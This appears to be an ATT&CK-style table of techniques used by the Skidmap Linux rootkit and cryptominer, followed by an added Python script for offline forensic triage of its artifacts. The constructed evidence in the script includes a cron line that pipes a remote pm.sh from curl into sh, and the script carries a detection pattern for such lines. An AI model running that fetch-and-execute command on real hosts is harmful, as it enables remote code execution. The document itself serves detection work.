| Domain | ID | Name | Use |
| --- | --- | --- | --- |
| enterprise | T1098 | Account Manipulation | - |
| enterprise | T1098.004 | SSH Authorized Keys | Skidmap has the ability to add the public key of its handlers to the authorized_keys file to maintain persistence on an infected host. |
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.006 | Kernel Modules and Extensions | Skidmap has the ability to install several loadable kernel modules (LKMs) on infected machines. |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.004 | Unix Shell | Skidmap has used pm.sh to download and install its main payload. |
| enterprise | T1140 | Deobfuscate/Decode Files or Information | Skidmap has the ability to download, unpack, and decrypt tar.gz files. |
| enterprise | T1083 | File and Directory Discovery | Skidmap has checked for the existence of specific files including /usr/sbin/setenforce and /etc/selinux/config. It also has the ability to monitor the cryptocurrency miner file and process. |
| enterprise | T1562 | Impair Defenses | - |
| enterprise | T1562.001 | Disable or Modify Tools | Skidmap has the ability to set SELinux to permissive mode. |
| enterprise | T1105 | Ingress Tool Transfer | Skidmap has the ability to download files on an infected host. |
| enterprise | T1036 | Masquerading | - |
| enterprise | T1036.005 | Match Legitimate Name or Location | Skidmap has created a fake rm binary to replace the legitimate Linux binary. |
| enterprise | T1556 | Modify Authentication Process | - |
| enterprise | T1556.003 | Pluggable Authentication Modules | Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users. |
| enterprise | T1027 | Obfuscated Files or Information | Skidmap has encrypted its main payload using 3DES. |
| enterprise | T1057 | Process Discovery | Skidmap has monitored critical processes to ensure resiliency. |
| enterprise | T1496 | Resource Hijacking | Skidmap is a kernel-mode rootkit used for cryptocurrency mining. |
| enterprise | T1014 | Rootkit | Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and to fake network and CPU-related statistics so that the CPU load of the infected machine always appears low. |
| enterprise | T1053 | Scheduled Task/Job | - |
| enterprise | T1053.003 | Cron | Skidmap has installed itself via crontab. |
| enterprise | T1518 | Software Discovery | - |
| enterprise | T1518.001 | Security Software Discovery | Skidmap has the ability to check if /usr/sbin/setenforce exists. setenforce is the utility used to switch SELinux between enforcing and permissive mode. |
| enterprise | T1082 | System Information Discovery | Skidmap has the ability to check whether the infected system's OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use. |
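Several of the behaviours in the table (the handler key dropped into authorized_keys, the replaced pam_unix.so and rm binaries, SELinux switched to permissive, the crontab entry that fetches pm.sh) leave artifacts that can be checked from disk without trusting the running kernel, which matters because the rootkit hooks system calls to hide files and fake CPU statistics. The script below is an added example written for this page; it is not Skidmap's code and not from the ATT&CK entry. It takes file contents and hashes as plain values so it runs offline against the constructed evidence at the bottom; on a live host you would feed it the real files (ideally read from a mounted image or rescue environment) and a baseline of hashes taken from the package manager or a clean install. The pam_unix.so path is the usual RHEL/CentOS location and is an assumption, as are the key blobs, hashes and the 203.0.113.7 address, all of which are constructed.

```python
"""Offline triage for the Skidmap artifacts listed in the table above.

Added example, not Skidmap's code. Every input is passed in as text or a
hash so the checks run without touching the (possibly hooked) live host.
"""
import base64
import hashlib
import re

# Paths from the table; the pam_unix.so location is an assumption
# (RHEL/CentOS layout) and differs on Debian (/lib/x86_64-linux-gnu/security).
PAM_UNIX = "/lib64/security/pam_unix.so"
RM_BIN = "/usr/bin/rm"
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def ssh_fingerprint(key_line):
    """SHA256 fingerprint of one authorized_keys line, in OpenSSH's
    'SHA256:<unpadded base64>' form. Handles an optional options prefix
    (e.g. from="..."), returns None for lines that are not keys."""
    fields = key_line.split()
    for i, field in enumerate(fields[:-1]):
        if field.startswith(KEY_TYPES):
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                return None
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    return None


def check_authorized_keys(text, known_fingerprints):
    """T1098.004: flag any key whose fingerprint is not in the approved set."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fp = ssh_fingerprint(line)
        if fp is None or fp not in known_fingerprints:
            findings.append(("T1098.004", "unapproved key " + (fp or repr(line[:40]))))
    return findings


def check_selinux_config(text):
    """T1562.001: SELINUX= in /etc/selinux/config set to anything but enforcing."""
    match = re.search(r"^\s*SELINUX\s*=\s*(\w+)", text, re.MULTILINE)
    mode = match.group(1).lower() if match else "missing"
    return [] if mode == "enforcing" else [("T1562.001", "SELinux mode is " + mode)]


def check_binary_integrity(actual_sha256, baseline_sha256, paths=(PAM_UNIX, RM_BIN)):
    """T1556.003 / T1036.005: on-disk hash differs from the package baseline."""
    findings = []
    for path in paths:
        if actual_sha256.get(path) != baseline_sha256.get(path):
            tech = "T1556.003" if path.endswith("pam_unix.so") else "T1036.005"
            findings.append((tech, path + " does not match baseline"))
    return findings


# curl/wget output piped into, or chained with, a shell.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*(\|\s*|&&\s*)(ba)?sh\b")


def check_crontab(text):
    """T1053.003: cron entries that download and execute remote content."""
    return [("T1053.003", "fetch-and-execute cron entry: " + line.strip())
            for line in text.splitlines()
            if not line.strip().startswith("#") and FETCH_AND_RUN.search(line)]


def triage(evidence, baseline):
    """Run all checks; returns (technique_id, detail) tuples in table order."""
    return (check_authorized_keys(evidence["authorized_keys"], baseline["ssh_fingerprints"])
            + check_selinux_config(evidence["selinux_config"])
            + check_binary_integrity(evidence["sha256"], baseline["sha256"])
            + check_crontab(evidence["crontab"]))


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# Constructed evidence. Real key blobs are binary structures; any bytes
# exercise the fingerprint arithmetic the same way.
ADMIN_KEY = "ssh-ed25519 " + base64.b64encode(b"constructed admin key").decode() + " admin@bastion"
HANDLER_KEY = "ssh-ed25519 " + base64.b64encode(b"constructed handler key").decode() + " root@localhost"
CLEAN_PAM, CLEAN_RM = b"constructed clean pam_unix.so", b"constructed clean rm"

BASELINE = {
    "ssh_fingerprints": {ssh_fingerprint(ADMIN_KEY)},
    "sha256": {PAM_UNIX: sha256_hex(CLEAN_PAM), RM_BIN: sha256_hex(CLEAN_RM)},
}
SAMPLE_EVIDENCE = {
    "authorized_keys": ADMIN_KEY + "\n" + HANDLER_KEY + "\n",
    "selinux_config": "# This file controls the state of SELinux on the system.\n"
                      "SELINUX=permissive\nSELINUXTYPE=targeted\n",
    "sha256": {PAM_UNIX: sha256_hex(b"constructed backdoored pam_unix.so"),
               RM_BIN: sha256_hex(CLEAN_RM)},
    "crontab": "*/5 * * * * curl -fsSL http://203.0.113.7/pm.sh | sh\n"
               "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf\n",
}

if __name__ == "__main__":
    for technique, detail in triage(SAMPLE_EVIDENCE, BASELINE):
        print(technique, detail)
```

On the constructed evidence the run reports the handler's key, the permissive SELinux setting, the modified pam_unix.so and the pm.sh cron entry, while the unmodified rm passes. The baseline hashes are the part that needs care: take them from `rpm -V`/`dpkg --verify` data or a known-clean image, not from the suspect host, and read the inputs from a mounted disk image where possible, since a loaded kernel module can lie to every tool on the live system.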